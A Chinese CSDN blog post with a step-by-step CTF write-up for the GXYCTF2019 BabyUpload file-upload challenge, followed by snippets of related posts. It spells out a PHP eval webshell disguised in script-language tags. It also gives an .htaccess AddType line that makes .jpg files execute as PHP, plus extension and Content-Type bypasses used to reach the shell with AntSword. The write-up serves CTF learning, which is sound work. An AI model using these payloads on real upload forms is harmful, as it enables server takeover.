[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)

最新推荐文章于 2024-05-19 14:29:37 发布
最新推荐文章于 2024-05-19 14:29:37 发布
阅读量589 收藏 2
点赞数
文章标签: web安全 安全 ctf 文件上传 waf绕过 htaccess
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oZuoShen123/article/details/133758646
版权

[GXYCTF2019]BabyUpload

1

解题流程

1、上传一句话,提示“后缀不允许ph”
2、修改后缀为jpg,提示“上传类型也太露骨了吧!”
3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊”
4、修改一句话的标识为:<script language="php"> @eval($_POST["pwd"]);</script>
  提示:/var/www/html/upload/1789acac5c7c2308dea99840cb37ebe1/yjh_putong.jpg succesfully uploaded!
5、上传.htaccess:AddType application/x-httpd-php .jpg
6、蚁剑连接,根目录找到flag即可
  url:http://2a2a1e20-d142-49f2-800e-447c5f1717be.node4.buuoj.cn:81/upload/1789acac5c7c2308dea99840cb37ebe1/yjh_putong.jpg
  密码:pwd

Hillain
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
BUU实战笔记——[GXYCTF2019]BabyUpload 1
qq_51175992的博客
07-14 834
对于文件上传一般就是先找到可以上传的文件类型,然后看传上去的文件是否可以正常使用,若不行,再考虑配置文件的方法。
[GXYCTF2019]BabyUpload
weixin_43152809的博客
11-17 3409
打开界面是一个文件上传 尝试一下 首先上传的是php文件 但是显示 后缀名不能有ph! emmm,看来是对php文件做了限制 随后习惯性上传png 返回 上传类型也太露骨了吧! emmm,随后又尝试了.htaccess和.user.ini文件都与上方显示相同 正当我一筹莫展之际 发现了题目页面的网址 我突然觉得我有希望了! 随后果然发现了题目的源码 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" conten
BUUCTF---web---[GXYCTF2019]BabyUpload
最新发布
2201_75556700的博客
05-19 144
4、上传包含该内容的test.txt,之后bp抓包修改文件名为.htaccess。2、上传php提示不能上传ph后缀,直接上传正常格式的图片提示太露骨了。5、利用重放器发送修改后的内容,发现成功上传了,放行。3、这里可以利用.htaccess进行绕过。6、接下来上传一句话木马test1.jpg。8、页面没有提示是图片错误,用蚁剑链接。
CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 847
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
Buuctf-[GXYCTF2019]BabyUpload
m0_63563528的博客
04-26 193
buuctf文件上传
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1884
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
BUUCTF:[GXYCTF2019]BabyUpload
末初的CSDN博客
03-24 6802
https://buuoj.cn/challenges#[GXYCTF2019]BabyUpload 有几个上传限制,一起来看一下 1、后缀名不能有ph!对于文件后缀名的限制,无法绕过这里 2、上传类型也太露骨了吧!对Content-Type的限制,修改为image/jpeg即可绕过 3、诶,别蒙我啊,这标志明显还是php啊对上传文件内容进行了检测,不能含有<?,这里的PHP版本为:PHP/5.6.23,可以使用<script language="php">eval($_POS
第四节 文件上传-绕过黑名单验证(.htaccess文件)-01
09-15
绕过黑名单验证是一种常见的攻击技术,攻击者可以使用各种方法来绕过黑名单验证,例如上传 .htaccess 文件、使用 phpinfo 探针、使用其他类型的文件等。因此,在 Web 应用程序安全中,需要格外小心地配置黑名单验证...
PHP+.htaccess实现全站静态HTML文件GZIP压缩传输(一)
10-31
PHP+.htaccess实现全站静态HTML文件GZIP压缩传输(一)
21个常用的apache .htaccess文件配置技巧分享
01-10
Apache Web 服务器可以通过 .htaccess 文件来操作各种信息,这是一个目录级配置文件的默认名称,允许去中央化的 Web 服务器配置管理。可用来重写服务器的全局配置。该文件的目的就是为了允许单独目录的访问控制配置...
通过配置.htaccess文件实现子目录绑定二级域名的方法
01-10
使用LINUX共享主机,控制面版是... 一般LINUX主机都支持.htaccess文件,所以我们可以通过.htaccess文件来实现转向 以下以blog目录和blog.shuxiong.net域名为例讲解一下 代码如下: # 开启功能 RewriteEngine on # 你要绑
upload类型题目总结
limenzzz的博客
04-20 1232
你传你🐎呢
web | CTFBUUCTF [GXYCTF2019]BabyUpload1
weixin_46301214的博客
09-05 319
通常apache和nginx都包含有 .htaccess 配置文件,可以试试这个漏洞。后来发现问题在Content-Type里,只能上传 image/jpeg 类型。但是发现还是能识别到,那就说明有php的特征被识别到了。那就需要使用图片码,但没有文件包含漏洞,无法执行。所以就采用上传.htaccess配置文件来。就改用JavaScript变成php来执行。然后更改文件名为jpeg后缀,上传。某文件变成php来执行。
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 592
BUUCTF的wp
BUUCTF [GXYCTF2019]BabyUpload 1详解(.htaccess配置文件特性)
m0_73734159的博客
11-29 1527
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性。倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码。先截断数据包再把上传的111.jpg文件更名为.htaccess文件。右键Repeater。
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2416
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload文件上传
BUUCTF [web专项29][GXYCTF2019]BabyUpload
yanglinchiji的博客
11-07 88
成功,再次上传 .htaccess 来修改后缀(吸取了上次文件上传题的经验,成功上传的结果没有index,不需要用.user.ini)发现后缀不能带ph,那么就猜测是需要上传木马图上去,在上传一些文件来修改上传目录的指定文件后缀为php来进行执行。上传成功,我们先到上传目录下的1.jpg下看看是否执行了。已经执行了,那么我们就需要蚁剑连上去即可。那就需要抓包修改上传类型来绕过检测了。进入后还是发现是个文件上传题。在根目录下即可获得flag。还是用以前总结出来的方法。
第三十六题——[GXYCTF2019]BabyUpload
分享简单的安全技术
04-23 367
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,一个文件上传框,推测是使用一句话木马获取shell查找flag 第二步:上传伪装好的pass.png,发现错误 pass.png内容: GIF89a? <script language="php">eval($_REQUEST[pass])</script> 第三步:将png格式修改为jpg格式上传,成功 第四步:上传.htaccess文件,让pass.jpg文件以php格式解析,注
【复习】BUUCTF:[GXYCTF2019]BabyUpload -- 对.htaccess的 包含自己和解析图片马为php文件都可以的 。。也算easy
Zero_Adam的博客
04-19 1031
一、自己做: 只需要更改Content-Type就能够绕过了,但是好像对文件内容有过滤。 那么,不能有? ,看看PHP的版本,看看能够用html的script进行绕过 能成功,看看能否解析。
文件上传.htaccess绕过
05-11
其中一个绕过上传限制的方法是利用.htaccess文件,它是一个配置文件,可以用来控制 Apache 服务器的行为。通过修改.htaccess文件中的某些配置,黑客可以成功绕过文件上传限制。比如可以尝试修改.htaccess文件中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hillain

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值